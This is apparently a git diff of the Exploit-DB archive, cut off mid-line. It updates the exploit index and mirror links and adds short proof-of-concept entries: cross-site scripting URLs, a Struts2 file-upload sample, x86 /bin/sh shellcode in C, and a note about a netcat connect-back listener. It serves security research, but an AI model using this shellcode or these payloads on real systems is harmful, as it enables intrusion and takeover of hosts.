id,file,description,date,author,platform,type,port 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability",2011-05-02,"Patrick Webster",java,webapps,0 35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting Vulnerability",2011-05-02,"AutoSec Tools",php,webapps,0 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 -35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 +35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip File) Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 @@ -33372,6 +33372,7 @@ id,file,description,date,author,platform,type,port 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0 +37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Stored XSS",2015-05-11,"XLabs Security",hardware,webapps,0 @@ -33389,3 +33390,18 @@ id,file,description,date,author,platform,type,port 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0 +37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 +37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0 +37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0 +37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 'id' Parameter Cross Site Scripting Vulnerability",2012-03-25,Crim3R,php,webapps,0 +37011,platforms/php/webapps/37011.txt,"Geeklog 1.8.1 'index.php' SQL Injection Vulnerability",2012-03-27,HELLBOY,php,webapps,0 +37012,platforms/php/webapps/37012.txt,"NextBBS 0.6 ajaxserver.php Multiple Function SQL Injection",2012-03-27,waraxe,php,webapps,0 +37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 index.php do Parameter XSS",2012-03-27,waraxe,php,webapps,0 +37014,platforms/windows/dos/37014.py,"iFTP 2.21 Buffer OverFlow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 +37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 +37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 'redirect_to' Parameter Cross Site Scripting Vulnerability",2012-03-28,"Stefan Schurtz",php,webapps,0 +37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 'searchText' Parameter Cross Site Scripting Vulnerability",2012-03-28,sonyy,php,webapps,0 +37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 index.php conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 +37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 index.php conditions[usergroup][] Parameter XSS",2013-03-27,"Aditya Modha",php,webapps,0 +37020,platforms/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows 'window.open()' URI Spoofing Vulnerability",2012-03-28,Lostmon,windows,remote,0 +37021,platforms/php/webapps/37021.txt,"TomatoCart 1.2.0 Alpha 2 'json.php' Local File Include Vulnerability",2012-03-28,"Canberk BOLAT",php,webapps,0 diff --git a/platforms/android/local/9477.txt b/platforms/android/local/9477.txt index de3c0b806..c3c0e4cc5 100755 --- a/platforms/android/local/9477.txt +++ b/platforms/android/local/9477.txt @@ -1,6 +1,6 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. orig: http://zenthought.org/content/file/android-root-2009-08-16-source -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz) # milw0rm.com [2009-08-18] diff --git a/platforms/asp/remote/15213.pl b/platforms/asp/remote/15213.pl index 5e2237066..1173cbb11 100755 --- a/platforms/asp/remote/15213.pl +++ b/platforms/asp/remote/15213.pl @@ -10,7 +10,7 @@ # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # A similar exploitation vector was also added lately in Padbuster v0.3: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl) # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) diff --git a/platforms/asp/webapps/37015.txt b/platforms/asp/webapps/37015.txt new file mode 100755 index 000000000..9de3e607b --- /dev/null +++ b/platforms/asp/webapps/37015.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52730/info + +Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/About.asp?ShowOriginal=">&ShowNew=a&ShowChanges=b + +http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=">&ShowChanges=b + +http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="> + +http://www.example.com/Search.asp?Search=&Page=0 \ No newline at end of file diff --git a/platforms/asp/webapps/8719.py b/platforms/asp/webapps/8719.py index bc80be0e6..effd81763 100755 --- a/platforms/asp/webapps/8719.py +++ b/platforms/asp/webapps/8719.py @@ -15,7 +15,7 @@ # for working with this exploit you need two asp file for updating hash you can download both from : # www.abysssec.com/files/dana.zip -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip) # then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code diff --git a/platforms/freebsd/local/12090.txt b/platforms/freebsd/local/12090.txt index e844aa1cc..e7f982ce3 100755 --- a/platforms/freebsd/local/12090.txt +++ b/platforms/freebsd/local/12090.txt @@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri improper handling of environment variables. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file diff --git a/platforms/freebsd/local/12091.txt b/platforms/freebsd/local/12091.txt index a510beca3..d4bf102aa 100755 --- a/platforms/freebsd/local/12091.txt +++ b/platforms/freebsd/local/12091.txt @@ -14,4 +14,4 @@ Vulnerability Description: Some files that allow to obtain usernames and other internal information can be read by any user inside the CLI. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file diff --git a/platforms/freebsd/remote/17462.txt b/platforms/freebsd/remote/17462.txt index fa8ae0785..94f10ebb7 100755 --- a/platforms/freebsd/remote/17462.txt +++ b/platforms/freebsd/remote/17462.txt @@ -196,7 +196,7 @@ Kingcope A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz) run like ./ssh -1 -z setup a netcat, port 443 on yourip first diff --git a/platforms/freebsd/remote/18181.txt b/platforms/freebsd/remote/18181.txt index 2f3bf5895..f2e173084 100755 --- a/platforms/freebsd/remote/18181.txt +++ b/platforms/freebsd/remote/18181.txt @@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar) diff --git a/platforms/freebsd/webapps/12658.txt b/platforms/freebsd/webapps/12658.txt index fed39d33a..fcff4e686 100755 --- a/platforms/freebsd/webapps/12658.txt +++ b/platforms/freebsd/webapps/12658.txt @@ -15,4 +15,4 @@ improper profile check. =========== Download: =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file diff --git a/platforms/hardware/dos/11043.txt b/platforms/hardware/dos/11043.txt index 96e38b604..aa30834f5 100755 --- a/platforms/hardware/dos/11043.txt +++ b/platforms/hardware/dos/11043.txt @@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com =============== Download =============== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Sony_Ericsson.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file diff --git a/platforms/hardware/dos/12093.txt b/platforms/hardware/dos/12093.txt index dbc2c1a7b..a77d569ed 100755 --- a/platforms/hardware/dos/12093.txt +++ b/platforms/hardware/dos/12093.txt @@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s of an insecure ulimit value. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0401.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file diff --git a/platforms/hardware/dos/13823.txt b/platforms/hardware/dos/13823.txt index 0bfdd3878..bc21da893 100755 --- a/platforms/hardware/dos/13823.txt +++ b/platforms/hardware/dos/13823.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/savysoda_poc.xls \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/13824.txt b/platforms/hardware/dos/13824.txt index 5eabc9d4f..137f83661 100755 --- a/platforms/hardware/dos/13824.txt +++ b/platforms/hardware/dos/13824.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/office2_poc.xls \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13824.xls (office2_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/13825.txt b/platforms/hardware/dos/13825.txt index d9beeb330..ead2087cb 100755 --- a/platforms/hardware/dos/13825.txt +++ b/platforms/hardware/dos/13825.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/goodreader_poc.xls \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/8013.txt b/platforms/hardware/dos/8013.txt index 288722da5..ce4c5476c 100755 --- a/platforms/hardware/dos/8013.txt +++ b/platforms/hardware/dos/8013.txt @@ -27,7 +27,7 @@ POC/EXPLOIT you can open this url with the browser or send mms with this image. http://es.geocities.com/jplopezy/nokiacrash.jpg -alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-nokiacrash.jpg +alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8013.jpg (2009-nokiacrash.jpg) ------------------------------------------------------ Juan Pablo Lopez Yacubian diff --git a/platforms/hardware/remote/12298.txt b/platforms/hardware/remote/12298.txt index 7256d64f4..f26fbe8ee 100755 --- a/platforms/hardware/remote/12298.txt +++ b/platforms/hardware/remote/12298.txt @@ -9,7 +9,7 @@ # V100R001B121Telmex # Exploit Download Link: # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/HG520_udpinfo.tar.gz +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12298.tar.gz (HG520_udpinfo.tar.gz) By sending a specially crafted UDP packet you can remotely obtain the diff --git a/platforms/hardware/remote/18291.txt b/platforms/hardware/remote/18291.txt index cfe9b1398..a04208392 100755 --- a/platforms/hardware/remote/18291.txt +++ b/platforms/hardware/remote/18291.txt @@ -7,6 +7,6 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/reaver-1.1.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz) diff --git a/platforms/hardware/remote/2034.txt b/platforms/hardware/remote/2034.txt index 8ffbbc628..32b9bc652 100755 --- a/platforms/hardware/remote/2034.txt +++ b/platforms/hardware/remote/2034.txt @@ -1,5 +1,5 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/07182006-btvoyager.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2034.tgz (07182006-btvoyager.tgz) # milw0rm.com [2006-07-18] diff --git a/platforms/hardware/remote/4522.html b/platforms/hardware/remote/4522.html index d852690ef..e91bda891 100755 --- a/platforms/hardware/remote/4522.html +++ b/platforms/hardware/remote/4522.html @@ -22,10 +22,12 @@ A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod ,Nervegas,erica,roxfan,phire and the rest of the dev team for all their work that helped make this happen. You can visit the dev team's site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page + +EDB Note: Old filename: 10112007-iphone.tif --> - + # milw0rm.com [2007-10-11] diff --git a/platforms/hardware/remote/8269.txt b/platforms/hardware/remote/8269.txt index 302e63290..1212c6934 100755 --- a/platforms/hardware/remote/8269.txt +++ b/platforms/hardware/remote/8269.txt @@ -197,7 +197,7 @@ name="backdoor"> Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Louhi_CMC-brute_090323.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) Other information: diff --git a/platforms/hardware/shellcode/13294.txt b/platforms/hardware/shellcode/13294.txt index f36d13c09..7cbceb2be 100755 --- a/platforms/hardware/shellcode/13294.txt +++ b/platforms/hardware/shellcode/13294.txt @@ -1,6 +1,6 @@ The pdf is located at: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lynn-cisco.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13294.pdf (lynn-cisco.pdf) /str0ke diff --git a/platforms/hardware/webapps/11101.txt b/platforms/hardware/webapps/11101.txt index b73b67902..2cddffd38 100755 --- a/platforms/hardware/webapps/11101.txt +++ b/platforms/hardware/webapps/11101.txt @@ -16,5 +16,5 @@ firmware versions have been confirmed to date: Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf -POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hnap0wn.tar.gz +POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11101.tar.gz (hnap0wn.tar.gz) diff --git a/platforms/hardware/webapps/12092.txt b/platforms/hardware/webapps/12092.txt index faac9a338..e2c6ae672 100755 --- a/platforms/hardware/webapps/12092.txt +++ b/platforms/hardware/webapps/12092.txt @@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti logged-in user. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0402.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file diff --git a/platforms/ios/local/14538.txt b/platforms/ios/local/14538.txt index 38aafd2e6..b7cec0416 100755 --- a/platforms/ios/local/14538.txt +++ b/platforms/ios/local/14538.txt @@ -1,3 +1,3 @@ The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ios_pdf_exploit.7z \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file diff --git a/platforms/java/webapps/37006.txt b/platforms/java/webapps/37006.txt new file mode 100755 index 000000000..0778f0287 --- /dev/null +++ b/platforms/java/webapps/37006.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52672/info + +Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected. + +http://www.exmaple.com/min/builder/#g=[XSS] \ No newline at end of file diff --git a/platforms/java/webapps/37009.xml b/platforms/java/webapps/37009.xml new file mode 100755 index 000000000..b259f313d --- /dev/null +++ b/platforms/java/webapps/37009.xml @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/52702/info + +Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. + +Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + + + + + + +

hacked by kxlzx

+

http://www.example.com

+ + + + + +
+
\ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/36858.c b/platforms/lin_x86-64/shellcode/36858.c index cf0636ca9..f3e465659 100755 --- a/platforms/lin_x86-64/shellcode/36858.c +++ b/platforms/lin_x86-64/shellcode/36858.c @@ -52,10 +52,10 @@ _start: int main(void) { - char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56= -\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; + char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56" + "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; - printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); + printf("strlen(shellcode)=%d\n", strlen(shellcode)); ((void (*)(void))shellcode)(); diff --git a/platforms/lin_x86/shellcode/13366.txt b/platforms/lin_x86/shellcode/13366.txt index 07715dfcb..1880fe574 100755 --- a/platforms/lin_x86/shellcode/13366.txt +++ b/platforms/lin_x86/shellcode/13366.txt @@ -1,5 +1,5 @@ # linux/x86 xor-encoded Connect Back Shellcode 371 bytes -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/black-RXenc-con-back.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13366.tar.gz (black-RXenc-con-back.tar.gz) # milw0rm.com [2006-04-18] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/36857.c b/platforms/lin_x86/shellcode/36857.c index 8fa77c049..c02969b4b 100755 --- a/platforms/lin_x86/shellcode/36857.c +++ b/platforms/lin_x86/shellcode/36857.c @@ -49,12 +49,12 @@ _start: int main(void) { - char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68= -\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; + char *shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68" + "\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; - printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); + printf("strlen(shellcode)=%d\n", strlen(shellcode)); ((void (*)(void))shellcode)(); return 0; -} +} \ No newline at end of file diff --git a/platforms/linux/dos/10203.txt b/platforms/linux/dos/10203.txt index a18cfa2c3..01162ad5d 100755 --- a/platforms/linux/dos/10203.txt +++ b/platforms/linux/dos/10203.txt @@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions. NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-bibtex-crash.tar.bz2 \ No newline at end of file +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file diff --git a/platforms/linux/dos/10206.txt b/platforms/linux/dos/10206.txt index bc140dbe9..0d5a3879b 100755 --- a/platforms/linux/dos/10206.txt +++ b/platforms/linux/dos/10206.txt @@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi Expat 2.0.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-1.gz (2009-11-22-36097.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file diff --git a/platforms/linux/dos/14573.txt b/platforms/linux/dos/14573.txt index c3f7b4048..ecb434adc 100755 --- a/platforms/linux/dos/14573.txt +++ b/platforms/linux/dos/14573.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera Versions up to and including libTIFF 3.9.4 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file diff --git a/platforms/linux/dos/18295.txt b/platforms/linux/dos/18295.txt index 63f4983e3..b3aaaffe8 100755 --- a/platforms/linux/dos/18295.txt +++ b/platforms/linux/dos/18295.txt @@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki -- http://pi3.com.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c) http://blog.pi3.com.pl/?p=277 diff --git a/platforms/linux/dos/35081.txt b/platforms/linux/dos/35081.txt index c499daf04..253c1bd8d 100755 --- a/platforms/linux/dos/35081.txt +++ b/platforms/linux/dos/35081.txt @@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils $ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2 -EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081 +EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35081.bin ... $ strings strings-bfd-badptr2 diff --git a/platforms/linux/local/1596.txt b/platforms/linux/local/1596.txt index 3db23b543..422181b32 100755 --- a/platforms/linux/local/1596.txt +++ b/platforms/linux/local/1596.txt @@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0 r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... -# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/xmodulepath.tgz +# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1596.tgz (xmodulepath.tgz) # milw0rm.com [2006-03-20] diff --git a/platforms/linux/local/1831.txt b/platforms/linux/local/1831.txt index b7b527798..d3876cd9c 100755 --- a/platforms/linux/local/1831.txt +++ b/platforms/linux/local/1831.txt @@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function). .bss section is in higher addresses than .dtors section, so, we can't hijack .dtors to.... -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05262006-tiffspl33t.tar.gz +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) nitr0us diff --git a/platforms/linux/local/34421.c b/platforms/linux/local/34421.c index 90585e435..88e01300d 100755 --- a/platforms/linux/local/34421.c +++ b/platforms/linux/local/34421.c @@ -1,5 +1,5 @@ // -// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2014-5119.tar.gz +// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz) // // // --------------------------------------------------- diff --git a/platforms/linux/local/35749.txt b/platforms/linux/local/35749.txt index 7d800cec3..fd673f01f 100755 --- a/platforms/linux/local/35749.txt +++ b/platforms/linux/local/35749.txt @@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/redstarroot.rpm +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35749.rpm (redstarroot.rpm) ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 diff --git a/platforms/linux/local/3730.txt b/platforms/linux/local/3730.txt index 92decafd2..3b4e77aec 100755 --- a/platforms/linux/local/3730.txt +++ b/platforms/linux/local/3730.txt @@ -1,5 +1,5 @@ ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04132007-pr0ftpd_modctrls.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) # milw0rm.com [2007-04-13] diff --git a/platforms/linux/local/7855.txt b/platforms/linux/local/7855.txt index 7ae3b24de..6ec6e2e07 100755 --- a/platforms/linux/local/7855.txt +++ b/platforms/linux/local/7855.txt @@ -3,6 +3,6 @@ PostgreSQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz -mirror: 